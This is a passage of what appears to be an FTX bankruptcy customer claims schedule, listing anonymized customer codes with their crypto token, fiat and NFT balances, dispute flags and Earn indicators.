| 07361644 | | AAVE[0], BAT[0], BCH[0], BF_POINT[300], BRZ[0], BTC[0.00000002], CUSDT[1], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07361646 | | USD[0.00] | | |
| 07361647 | | BAT[1], USD[0.00] | | |
| 07361648 | | USD[10.00] | | |
| 07361649 | | CUSDT[1], USD[11.09] | Yes | |
| 07361650 | | USD[10.00] | | |
| 07361651 | | DOGE[555.74111664], TRX[1], USD[11.03] | Yes | |
| 07361652 | | USD[10.00] | | |
| 07361653 | | USD[0.00] | | |
| 07361654 | | USD[0.00] | | |
| 07361656 | | DOGE[197.09051046], USD[0.00] | | |
| 07361657 | | BRZ[1], CUSDT[4], DOGE[1.08900431], GRT[1], LINK[16.84440876], TRX[3], UNI[1.09533986], USD[113.89] | Yes | |
| 07361660 | | BTC[.00056028] | | |
| 07361661 | | USD[0.00] | | |
| 07361662 | | CUSDT[5.00225295], DOGE[0], GRT[1], SOL[0], TRX[0], USD[0.00] | | |
| 07361663 | | USD[0.01] | | |
| 07361664 | | USD[10.00] | | |
| 07361665 | | USD[10.00] | | |
| 07361666 | | BRZ[1], CUSDT[1], DOGE[2], GRT[1.00211094], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07361667 | | USD[10.00] | | |
| 07361669 | | USD[10.00] | | |
| 07361670 | | SOL[2.19483227], USD[0.01] | Yes | |
| 07361671 | | USD[10.00] | | |
| 07361672 | | CUSDT[1], ETH[.01572851], ETHW[.01553699], SOL[.06724983], TRX[1], USD[283.00], USDT[0] | Yes | |
| 07361673 | | USD[10.00] | | |
| 07361674 | | CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07361675 | | USD[0.00] | Yes | |
| 07361676 | | USD[10.00] | | |
| 07361677 | | BTC[.00000853], NFT (345461940651460611/Entrance Voucher #3814)[1], USD[0.06] | | |
| 07361678 | | BRZ[2], CUSDT[3], DOGE[49.98701561], ETHW[.60766882], GRT[1], NFT (437557619507661179/FTX - Off The Grid Miami #4788)[1], SHIB[13], SOL[.00134613], TRX[578.8486911], USD[0.00] | Yes | |
| 07361679 | | BRZ[1], USD[0.01] | Yes | |
| 07361680 | | USD[10.00] | | |
| 07361681 | | USD[10.00] | | |
| 07361682 | | USD[10.00] | | |
| 07361683 | | CUSDT[1], DOGE[6897.21548553], TRX[126.60849465], USD[0.00] | | |
| 07361684 | | SHIB[151.44647153], USD[0.00] | Yes | |
| 07361685 | | USD[10.00] | | |
| 07361686 | | BAT[33.59542054], CUSDT[1], DOGE[243.70884963], SOL[4.33885936], SUSHI[2.67079184], TRX[622.13053003], USD[0.00] | | |
| 07361687 | | KSHIB[151.68800354], USD[0.00] | | |
| 07361688 | | EUR[0.00], MATIC[.00154736], NFT (503909033008429788/Belugie #1192)[1], SOL[0], SUSHI[.00059893], TRX[.00017048], USD[7.20], USDT[0.00001925] | Yes | |
| 07361689 | | USD[10.00] | | |
| 07361691 | Contingent, Disputed | USD[10.00] | | |
| 07361692 | | CUSDT[1], DOGE[2465.8730241], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361693 | | USD[10.00] | | |
| 07361695 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07361697 | | BRZ[1], CUSDT[1], DOGE[9743.885081], USD[0.00] | Yes | |
| 07361698 | | DOGE[1], USD[0.27] | Yes | |
| 07361699 | | USD[10.00] | | |
| 07361702 | | USD[10.00] | | |
| 07361703 | | USD[10.00] | | |
| 07361704 | | DOGE[6.60209837], USD[0.00] | | |
| 07361705 | | BAT[55.2746396], BRZ[287.30538113], BTC[.00199793], CUSDT[515.23588007], DOGE[2499.60116051], TRX[1132.74003155], USD[0.00] | Yes | |
| 07361708 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07361709 | | USD[10.00] | | |
| 07361711 | | CUSDT[4], ETH[.00231587], ETHW[.00231587], USD[0.00] | | |
| 07361712 | | USD[10.00] | | |
| 07361713 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07361714 | | CUSDT[1], DOGE[18.28167647], ETH[.0000001], ETHW[.0000001], USD[0.00] | | |
| 07361715 | | BRZ[2], DOGE[3], GRT[100.01453503], LINK[36.18139088], SOL[26.50917592], TRX[3], UNI[30.99887015], USD[12.70] | | |
| 07361716 | | USD[10.00] | | |
| 07361717 | | DOGE[.01744641], USD[0.00] | | |
| 07361718 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], LTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07361720 | | USD[10.00] | | |
| 07361721 | | USD[10.00] | | |
| 07361722 | | DOGE[25.16590433], USD[0.00] | | |
| 07361723 | | ETH[.00562136], ETHW[.00562136], TRX[1], USD[0.00] | | |
| 07361724 | | DOGE[212.66304189], USD[0.00] | Yes | |
| 07361726 | | USD[10.00] | | |
| 07361727 | | BCH[0], BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], NFT [302757111560516798/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #7][1], NFT [556603168715972726/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #7][1], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07361728 | | USD[10.00] | | |
| 07361729 | | USD[10.00] | | |
| 07361730 | | CUSDT[1], DOGE[3635.78448992], SHIB[12611678.72899735], TRX[2], USD[0.00], USDT[1.09726586] | Yes | |
| 07361731 | | USD[10.00] | | |
| 07361732 | | BTC[.0161718], DOGE[18616.352], LTC[.00644], TRX[.556], USD[-599.88], USDT[595.82000000] | | |
| 07361733 | | CUSDT[10], ETH[.00000001], GRT[3.14837738], TRX[12.14847729], USD[0.01], USDT[0] | Yes | |
| 07361734 | | USD[10.00] | | |
| 07361735 | | USD[0.00] | | |
| 07361736 | | BTC[.00014475], DOGE[0.00001833], USD[0.00] | | |
| 07361737 | | USD[10.00] | | |
| 07361738 | | BRZ[3], BTC[0], CUSDT[23], DOGE[11], ETH[0], ETHW[0], GRT[2], SHIB[9], SUSHI[1], TRX[12], USD[63.40], USDT[0] | | |
| 07361739 | | USD[10.00] | | |
| 07361741 | | USD[10.00] | | |
| 07361742 | | LINK[1.28651696], USD[0.00] | | |
| 07361744 | | USD[10.00] | | |
| 07361745 | | USD[10.00] | | |
| 07361746 | | USD[0.00] | | |
| 07361748 | | BTC[0], SUSHI[0], USD[0.00] | | |
| 07361749 | | DOGE[1.45183063], TRX[3.96395752], USD[0.01] | Yes | |
| 07361750 | | BTC[.00021423], USD[0.00] | | |
| 07361751 | | AAVE[.00947262], ALGO[2.59699406], AVAX[.02379138], BAT[66.27939043], BCH[.00382948], BRZ[2], BTC[0.00031126], CUSDT[142.16300653], DAI[1.09356453], DOGE[1026.5894255], ETH[.00409968], ETHW[.00404496], EUR[0.00], GRT[45.73822912], KSHIB[158.5724974], LINK[2.54885088], LTC[.01811726], MATIC[88.50843624], MKR[.00477009], NEAR[.18776361], PAXG[.00063731], SHIB[182481.613166557], SOL[1.49422257], SUSHI[.15146682], TRX[49.46293053], UNI[3.76953981], USD[29.55], USDT[1.09514533], YFI[.0003573] | Yes | |
| 07361752 | | USD[11.08] | Yes | |
| 07361753 | | CUSDT[2], SHIB[1], TRX[1], USD[0.00] | | |
| 07361754 | | USD[0.00] | | |
| 07361755 | | USD[10.00] | | |
| 07361756 | | DOGE[75.61891906], ETH[.00288359], ETHW[.00284255], SHIB[203316.29255514], USD[0.00] | Yes | |
| 07361757 | | USD[10.00] | | |
| 07361758 | | BTC[.00013704], USD[10.00] | | |
| 07361759 | | DOGE[141.530737], USD[0.00] | | |
| 07361760 | | USD[10.00] | | |
| 07361761 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361762 | | DOGE[0], SHIB[15731111.91167214], TRX[49022.3362494], USD[0.00] | Yes | |
| 07361763 | | CUSDT[1], SHIB[578876.16331635], USD[0.00] | Yes | |
| 07361765 | | USD[0.00] | | |
| 07361767 | | GRT[10.02157203], USD[0.00] | | |
| 07361768 | | CUSDT[1], TRX[1925.86373761], USD[0.00] | Yes | |
| 07361769 | | USD[10.00] | | |
| 07361770 | | USD[0.00], USDT[0] | | |
| 07361771 | | USD[10.00] | | |
| 07361772 | | USD[10.00] | | |
| 07361773 | | BTC[.00020211], CUSDT[3], TRX[2], USD[0.00] | Yes | |
| 07361774 | | USD[10.00] | | |
| 07361775 | | AUD[0.00], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GBP[0.00], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07361776 | | USD[10.00] | | |
| 07361778 | | BAT[.0000012], BRZ[2], CUSDT[2], DOGE[.00048099], SHIB[1], TRX[.00079053], USD[0.00] | Yes | |
| 07361779 | | USD[10.00] | | |
| 07361780 | | USD[10.00] | | |
| 07361781 | | USD[0.00] | | |
| 07361782 | | BAT[3], BRZ[5], BTC[0], CUSDT[15], DOGE[1], ETH[0], GRT[1], TRX[2], USD[0.00] | | |
| 07361783 | | CUSDT[3], DOGE[1], SHIB[1], USD[368.36] | Yes | |
| 07361785 | | USD[0.00] | | |
| 07361786 | | CUSDT[2], DOGE[85.64673692], USD[0.00] | | |
| 07361787 | | USD[0.01] | | |
| 07361788 | | CUSDT[3], DOGE[4481.70317852], TRX[1], USD[10.00] | | |
| 07361789 | | SHIB[1], TRX[1301.91412122], USD[0.00], USDT[0] | Yes | |
| 07361791 | | USD[10.00] | | |
| 07361792 | | USD[10.00] | | |
| 07361794 | | BAT[1], BRZ[2], BTC[0], CUSDT[20], DOGE[12.39505008], SHIB[4], SOL[.00005506], TRX[8], USD[0.00], USDT[0.00004950] | Yes | |
| 07361795 | | USD[0.00] | | |
| 07361796 | | USD[10.00] | | |
| 07361797 | | USD[10.00] | | |
| 07361798 | | USD[10.00] | | |
| 07361799 | | BAT[2.06838165], BTC[.00000016], CUSDT[10], DOGE[.02562363], ETH[0], ETHW[0], LINK[.00019827], LTC[.00000693], MATIC[.00403681], TRX[.000171], UNI[.00022064], USD[0.00], USDT[40.23552956] | Yes | |
| 07361800 | | DOGE[26.24747144], USD[0.00] | | |
| 07361801 | | USD[10.00] | | |
| 07361802 | | USD[10.00] | | |
| 07361805 | | DOGE[0], TRX[0], USD[0.00], YFI[0] | | |
| 07361806 | | CUSDT[2], DOGE[1], TRX[1093.98697353], USD[0.04] | | |
| 07361807 | | USD[10.00] | | |
| 07361808 | | DOGE[1], USD[0.00] | | |
| 07361809 | | DOGE[.00002731], USD[0.00] | | |
| 07361811 | | USD[0.00] | | |
| 07361812 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07361813 | | BTC[.00000095], ETH[.00000071], USD[0.01] | Yes | |
| 07361815 | | BTC[0], DOGE[4], SUSHI[0], USD[0.00], USDT[0] | | |
| 07361816 | | USD[0.01] | | |
| 07361817 | | USD[10.00] | | |
| 07361818 | | USD[10.00] | | |
| 07361819 | | USD[10.00] | | |
| 07361820 | | AVAX[0], ETH[0], LINK[0], SHIB[1], TRX[0], USD[0.01] | Yes | |
| 07361821 | | USD[0.01] | | |
| 07361822 | | USD[10.00] | | |
| 07361823 | | CUSDT[2], DOGE[1], USD[27.02] | | |
| 07361824 | | BRZ[1], CUSDT[5], DOGE[3.30026672], TRX[1.00002448], USD[0.00] | | |
| 07361825 | | BTC[0], NEAR[.01472546], SOL[78], USD[0.12] | | |
| 07361826 | | SHIB[1], USD[0.00] | | |
| 07361827 | | USD[0.00] | | |
| 07361828 | | BRZ[1], BTC[.00002352], CUSDT[1], DOGE[0.00000061], USD[0.00] | Yes | |
| 07361829 | | TRX[123.35653464], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361830 | | USD[10.00] | | |
| 07361831 | | CUSDT[2], USD[0.00] | | |
| 07361832 | | USD[10.00] | | |
| 07361833 | | BTC[0], LTC[0], USD[0.00] | Yes | |
| 07361834 | | USD[10.00] | | |
| 07361835 | | DOGE[.76965009], TRX[1], USD[0.23] | | |
| 07361836 | | BRZ[3], CUSDT[10], DOGE[5], ETH[0], GRT[337.02615265], KSHIB[0], LINK[2.26025935], SHIB[1], SUSHI[0], TRX[1], USD[0.00], USDT[1.08569734] | Yes | |
| 07361838 | | USD[10.00] | | |
| 07361839 | | BAT[225.93985351], BCH[.18966016], BRZ[3039.19366544], BTC[.4561016], CAD[275.35], CUSDT[20], DOGE[4440.6562451], ETH[.3996638], ETHW[39954756], EUR[890.98], GRT[110.9129725], LTC[9.80579264], NFT [375328909495185223/SolBunnies #650][1], PAXG[1.01133313], SGD[1365.57], SHIB[2], SOL[38.00748621], SUSHI[384.01092404], TRX[1694.17355148], USD[38975.36], USDT[3.18783656] | Yes | |
| 07361840 | | USD[10.00] | | |
| 07361841 | | CUSDT[16], USD[0.00] | | |
| 07361842 | | USD[10.00] | | |
| 07361845 | | BAT[1], CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07361846 | | USD[0.72], USDT[0.00000001] | | |
| 07361847 | | USD[0.00] | | |
| 07361848 | | CUSDT[1], USD[0.00] | | |
| 07361849 | | BTC[0.00609784], CUSDT[1], ETH[.19934497], ETHW[.19934497], USD[10.00] | | |
| 07361850 | | USD[10.00] | | |
| 07361852 | | TRX[3119.360005] | | |
| 07361853 | | CUSDT[6], TRX[2], USD[110.97] | | |
| 07361854 | | USD[10.00] | | |
| 07361855 | | USD[10.00] | | |
| 07361856 | | CUSDT[1], DOGE[2.15857833], USD[0.00] | | |
| 07361857 | | BAT[.04490802], BRZ[1], CUSDT[2], SUSHI[61.63937008], TRX[8416.83031772], USD[96.56], USDT[1] | | |
| 07361859 | | USD[10.00] | | |
| 07361860 | | CUSDT[2], DOGE[.00066257], USD[0.00] | | |
| 07361864 | | BTC[.00054754], CUSDT[10], DOGE[298.51509823], LTC[.01563031], USD[0.00] | | |
| 07361866 | | USD[10.00] | | |
| 07361867 | | DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07361868 | | USD[10.95] | Yes | |
| 07361869 | | DOGE[0], USD[0.01], USDT[0] | Yes | |
| 07361871 | | CUSDT[1], USD[0.00] | | |
| 07361872 | | USD[10.00] | | |
| 07361873 | | USD[10.00] | | |
| 07361874 | | USD[10.00] | | |
| 07361875 | | DOGE[475.27091118], TRX[1], USD[0.02] | Yes | |
| 07361876 | | USD[10.00] | | |
| 07361877 | | BTC[0], SHIB[1], USD[0.00] | Yes | |
| 07361878 | | BAT[1], CUSDT[2], DOGE[971.47748626], ETH[0], TRX[1], USD[0.00] | | |
| 07361879 | | BRZ[1], CUSDT[1], TRX[2], UNI[1], USD[0.01] | | |
| 07361882 | | CUSDT[2], DOGE[40.8579454], USD[0.00] | Yes | |
| 07361883 | | TRX[216.15124808], USD[0.00] | | |
| 07361884 | | BAT[473.89701104], DOGE[1099.01645515], ETH[.26327979], ETHW[0.26308539], SHIB[64597101.22806372], USD[0.00] | Yes | |
| 07361885 | | USD[10.00] | | |
| 07361886 | | DOGE[0], SOL[.95537071], USD[0.00] | | |
| 07361887 | | CUSDT[5], ETH[.05723064], ETHW[.05651928], TRX[6], USD[0.99] | Yes | |
| 07361888 | | USD[10.00] | | |
| 07361889 | | CUSDT[2], USD[0.01], USDT[0] | Yes | |
| 07361890 | | CUSDT[1], DOGE[292.56866806], USD[10.00] | | |
| 07361891 | | CUSDT[1], USD[0.00] | Yes | |
| 07361892 | | USD[10.00] | | |
| 07361893 | | USD[0.00], USDT[9.94805028] | | |
| 07361894 | | BRZ[0], DAI[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07361895 | | TRX[1.66272071], USD[0.00] | | |
| 07361896 | | CUSDT[1], DOGE[0], LTC[0], USD[0.00] | | |
| 07361897 | | USD[10.00] | | |
| 07361898 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361899 | | CUSDT[3], TRX[1], USD[19.81] | | |
| 07361900 | | USD[10.00] | | |
| 07361901 | | USD[10.00] | | |
| 07361902 | | BCH[.03949644], DOGE[149.15578837], ETH[0.43951025], ETHW[0.43932579], GRT[30.94969303], KSHIB[95.56573096], LINK[.23544694], PAXG[.00039028], SHIB[103514.28369849], SOL[1.20230946], USD[0.00], USDT[0] | Yes | |
| 07361903 | | USD[0.01] | Yes | |
| 07361904 | | USD[10.00] | | |
| 07361905 | | USD[10.00] | | |
| 07361906 | | USD[0.00] | | |
| 07361907 | | USD[10.00] | | |
| 07361908 | | USD[10.00] | | |
| 07361909 | | USD[10.00] | | |
| 07361910 | | BTC[.00163916], CUSDT[1], NFT (445714396349500799/Entrance Voucher #3863)[1], SHIB[5782.79964705], USD[0.00] | Yes | |
| 07361911 | | CUSDT[2], SHIB[3628661.58079781], SOL[.07290689], TRX[1.35580947], USD[137.90] | Yes | |
| 07361912 | | USD[10.00] | | |
| 07361913 | | BRZ[51.28471078], USD[0.07] | | |
| 07361914 | | USD[10.00] | | |
| 07361915 | | BCH[0], BTC[0], CUSDT[1], TRX[1], USD[0.00] | | |
| 07361916 | | USD[10.00] | | |
| 07361917 | | CUSDT[7], DOGE[1333.93569684], ETH[.02700645], ETHW[.02700645], SHIB[204683.04237665], TRX[1], USD[0.34] | | |
| 07361918 | | BAT[0], BRZ[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.31] | | |
| 07361920 | | USD[10.00] | | |
| 07361921 | | USD[10.00] | | |
| 07361922 | | USD[0.00] | | |
| 07361923 | | USD[10.00] | | |
| 07361924 | | USD[10.00] | | |
| 07361925 | | USD[10.00] | | |
| 07361926 | | USD[10.00] | | |
| 07361927 | | USD[10.27] | | |
| 07361929 | | USD[10.00] | | |
| 07361930 | | USD[10.00] | | |
| 07361931 | | BRZ[1], CUSDT[19], DOGE[1.32251629], SHIB[3], TRX[3.19159672], USD[0.00] | | |
| 07361932 | | USD[10.00] | | |
| 07361933 | | BRZ[.686], CUSDT[2.15960467], DAI[.0019585], DOGE[.00153014], GRT[.00000601], LINK[.00000061], LTC[.00000029], TRX[.61380266], USD[0.01] | | |
| 07361934 | | CUSDT[2], DOGE[584.40063704], USD[0.00] | Yes | |
| 07361936 | | USD[10.00] | | |
| 07361937 | | BRZ[1], CUSDT[1], DOGE[.63292695], TRX[2], USD[0.00] | Yes | |
| 07361938 | | USD[10.00] | | |
| 07361939 | | USD[10.00] | | |
| 07361940 | | CUSDT[4], DOGE[1211.17508651], SHIB[2201125.17612402], TRX[1], USD[0.00] | Yes | |
| 07361941 | | USD[10.00] | | |
| 07361942 | | DOGE[.0402297], USD[0.00], USDT[0] | Yes | |
| 07361943 | | ETHW[1.653], USD[0.00] | | |
| 07361944 | | USD[10.00] | | |
| 07361945 | | USD[0.00] | | |
| 07361946 | | CUSDT[3], KSHIB[306.50340456], NFT (398584835505075156/Cyber Pharmacist 5359)[1], PAXG[.01202863], SOL[16.13192371], TRX[2], USD[0.01] | Yes | |
| 07361947 | | BRZ[1], SOL[.00002204], USD[0.26] | Yes | |
| 07361948 | | USD[10.00] | | |
| 07361949 | | USD[10.00] | | |
| 07361951 | | USD[10.00] | | |
| 07361952 | | BRZ[1], CUSDT[1], SHIB[4], TRX[3], USD[0.01] | Yes | |
| 07361955 | | USD[0.00] | | |
| 07361958 | | DOGE[201.58782667], USD[0.00] | | |
| 07361960 | | TRX[1], USD[0.00] | | |
| 07361961 | | GRT[1.00498957], TRX[1], USD[11.05], USDT[0.00000767] | Yes | |
| 07361962 | | TRX[163.29257104], USD[0.00] | | |
| 07361964 | | USD[0.00] | | |
| 07361965 | | USD[10.00] | | |
| 07361966 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361967 | | USD[10.00] | | |
| 07361969 | | CUSDT[3], DOGE[1], LINK[.77427579], USD[0.00] | | |
| 07361970 | | BAT[0], DOGE[0], LTC[0.59578586], SOL[0], SUSHI[0], TRX[0], UNI[1.10022355], USD[0.00], USDT[0] | | |
| 07361972 | | USD[10.00] | | |
| 07361973 | | CUSDT[3], DOGE[6], GBP[0.00], TRX[1], USD[0.00] | | |
| 07361975 | | USD[10.00] | | |
| 07361977 | | USD[10.00] | | |
| 07361978 | | USD[10.00] | | |
| 07361979 | | USD[10.00] | | |
| 07361980 | | USD[10.00] | | |
| 07361981 | | USD[0.72] | Yes | |
| 07361983 | | BAT[.00001632], CUSDT[3], DOGE[3.00029257], SOL[.00001437], SUSHI[.00006594], USD[0.01] | | |
| 07361985 | | USD[11.01] | Yes | |
| 07361986 | | LTC[.03536468], USD[0.00] | | |
| 07361988 | | USD[10.00] | | |
| 07361989 | | USD[10.00] | | |
| 07361990 | | DOGE[1219.11501777], USD[0.00] | Yes | |
| 07361991 | | USD[0.00] | | |
| 07361992 | | BAT[1.01655549], BRZ[11.04963543], BTC[.00216267], CUSDT[32], GRT[3.17856345], MATIC[0.00045751], SHIB[10.84475997], SOL[.35708505], TRX[29.8193043], USD[0.11], USDT[3.3152386] | Yes | |
| 07361993 | | ALGO[99.8934913], USD[0.00] | Yes | |
| 07361994 | | USD[10.00] | | |
| 07361995 | | TRX[0], USD[0.00], USDT[0] | Yes | |
| 07361996 | | USD[10.00] | | |
| 07361998 | Contingent, Disputed | USD[0.24] | | |
| 07361999 | Contingent, Disputed | SUSHI[.57900418], USD[0.00] | | |
| 07362000 | | USD[0.00] | | |
| 07362001 | | USD[0.38] | | |
| 07362003 | | DOGE[2], GRT[1], NFT (35291505109898895/Panda Patrol #2011)[1], SHIB[5], SOL[.00000001], TRX[8], USD[0.00], USDT[0.0000001] | | |
| 07362004 | | USDT[0.00000022] | | |
| 07362005 | | CUSDT[1], DOGE[1563.50556918], LINK[0], NFT (374940160214356451/Cool Bean #2958)[1], NFT (473850824502643997/Cool Bean #3860)[1], SHIB[4], SOL[22.03784739], TRX[2], USD[0.00] | Yes | |
| 07362006 | | USD[10.00] | | |
| 07362007 | | USD[10.00] | | |
| 07362008 | | USD[10.00] | | |
| 07362009 | | TRX[76.03528888], USD[0.00] | | |
| 07362010 | | DOGE[42836.51785379], SHIB[62521.44972277], USD[0.00] | Yes | |
| 07362011 | | BRZ[1], DOGE[1], GRT[640.03255137], USD[0.00] | | |
| 07362012 | | BRZ[7], BTC[0], CUSDT[19], DOGE[6], ETH[0], GRT[1], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07362013 | | USD[0.01] | Yes | |
| 07362014 | | USD[10.00] | | |
| 07362016 | | USD[10.00] | | |
| 07362017 | | USD[10.00] | | |
| 07362018 | | DOGE[342.77576913], USD[0.00] | | |
| 07362019 | | USD[10.00] | | |
| 07362021 | | USD[0.00] | Yes | |
| 07362023 | Contingent, Disputed | CUSDT[1], USD[0.00] | | |
| 07362024 | Contingent, Disputed | USD[0.00] | Yes | |
| 07362025 | | CUSDT[2], DOGE[30.14981412], USD[0.00] | | |
| 07362026 | | USD[10.83] | Yes | |
| 07362027 | | USD[10.00] | | |
| 07362030 | | USD[10.00] | | |
| 07362032 | | USD[10.00] | | |
| 07362033 | | USD[10.00] | | |
| 07362034 | | BTC[.0506129], CUSDT[2], DOGE[9.01738932], ETHW[.19823125], GRT[1], LINK[17.65487504], SHIB[11], SOL[0.00000001], SUSHI[.00000088], TRX[5], USD[0.00], USDT[0.00000001] | Yes | |
| 07362035 | | CUSDT[2], DOGE[2172.19689345], ETH[.03418878], ETHW[.03418878], USD[10.00] | | |
| 07362036 | | BAT[1], BRZ[1], CUSDT[2], USD[0.01], USDT[1] | | |
| 07362037 | | USD[10.00] | | |
| 07362038 | | USD[10.00] | | |
| 07362039 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362040 | | CUSDT[1], DOGE[3], USD[0.01] | | |
| 07362041 | | USD[70.89], YFI[.000981] | | |
| 07362042 | | USD[10.00] | | |
| 07362043 | | ETHW[.00083357], USD[2.30] | | |
| 07362044 | | ALGO[.01822142], AUD[0.00], BAT[0], BRZ[0.00007475], BTC[0.00000001], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0.00202442], EUR[0.00], GBP[0.00], GRT[0], KSHIB[1.23151351], LINK[0], LTC[0.00000003], MATIC[0], NEAR[.00000001], NFT (332240220516489251/Imola Ticket Stub #1980)[1], NFT (455477126905807112/Barcelona Ticket Stub #1191)[1], PAXG[0], SGD[0.00], SHIB[188.61086018], SOL[0.00001436], SUSHI[0.01149976], TRX[0.17927641], UNI[0.00000018], USD[0.01], USDT[0.00000026], YFI[0] | Yes | |
| 07362046 | | USD[10.00] | | |
| 07362047 | | USD[10.00] | | |
| 07362048 | | BRZ[1], DOGE[0], USD[0.00] | | |
| 07362049 | | USD[10.00] | | |
| 07362050 | | BTC[0], DOGE[323.42806632], USD[0.00] | | |
| 07362051 | | BRZ[0], USD[0.00] | | |
| 07362053 | | USD[10.00] | | |
| 07362054 | | DOGE[2.17228655], USD[0.00], USDT[0] | | Yes | |
| 07362055 | | TRX[163.50435585], USD[0.00] | | |
| 07362056 | | USD[10.00] | | |
| 07362057 | | BAT[1], BRZ[2], CUSDT[1], DOGE[525.96655234], TRX[92.30980983], USD[0.00] | | |
| 07362058 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07362059 | | USD[10.00] | | |
| 07362060 | | CUSDT[1], MATIC[5.17579055], USD[0.00] | Yes | |
| 07362061 | | USD[10.00] | | |
| 07362063 | | BTC[.00008345], DOGE[64.77911404], USD[0.00] | | |
| 07362064 | | BAT[1], CUSDT[2], DOGE[102252.05443455], TRX[3], USD[0.00], USDT[2] | | |
| 07362065 | | USD[10.00] | | |
| 07362066 | | USD[10.00] | | |
| 07362067 | | USD[10.00] | | |
| 07362068 | | BTC[.04293477], CUSDT[20], DOGE[15527.79984263], ETH[.70073486], ETHW[.70073486], GRT[21.94977896], LINK[.65879094], TRX[1231.49212548], USD[0.00], USDT[7.05963135] | | |
| 07362069 | | USD[10.00] | | |
| 07362071 | | DOGE[4415.17555483], ETH[.00564447], ETHW[.00564447], USD[0.00] | | |
| 07362072 | | USD[10.00] | | |
| 07362073 | | DOGE[2], USD[0.00] | | |
| 07362074 | | USD[10.00] | | |
| 07362075 | | USD[11.02] | Yes | |
| 07362076 | | USD[10.00] | | |
| 07362077 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07362079 | | BAT[1.0165555], CUSDT[1], DOGE[20509.37107105], LTC[.05727421], TRX[2], USD[0.00] | Yes | |
| 07362080 | | CUSDT[14], DOGE[217.40107026], KSHIB[665.48471432], LTC[4.50990814], MATIC[189.21194011], NFT (359919028769334588/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #53)[1], NFT (365460049355178211/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #82)[1], NFT (388885215502703348/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #50)[1], NFT (403663337689824686/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #45)[1], NFT (410399850432957501/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #66)[1], NFT (439684805478236490/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #51)[1], NFT (444409144962750595/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #54)[1], NFT (463853367822767735/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #44)[1], NFT (512533077701883267/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #55)[1], NFT (519061070480334709/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #54)[1], NFT (525978903556142087/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #70)[1], NFT (565153202692544351/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #49)[1], NFT (572580503027621713/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #57)[1], SHIB[1], SOL[17.78716105], TRX[3], USD[0.00] | Yes | |
| 07362081 | | BTC[.00005783], DOGE[13.21878045], ETH[.00065535], ETHW[.00065243], SOL[.13867214], SUSHI[.06825041], TRX[23.41253282], USD[0.00], YFI[.00005741] | Yes | |
| 07362082 | | BTC[0], USD[0.00] | | |
| 07362083 | | DOGE[135.74381775], USD[0.00] | | |
| 07362084 | | DOGE[1], GRT[4.14548876], USD[0.00] | | |
| 07362085 | | CUSDT[1], USD[0.00] | | |
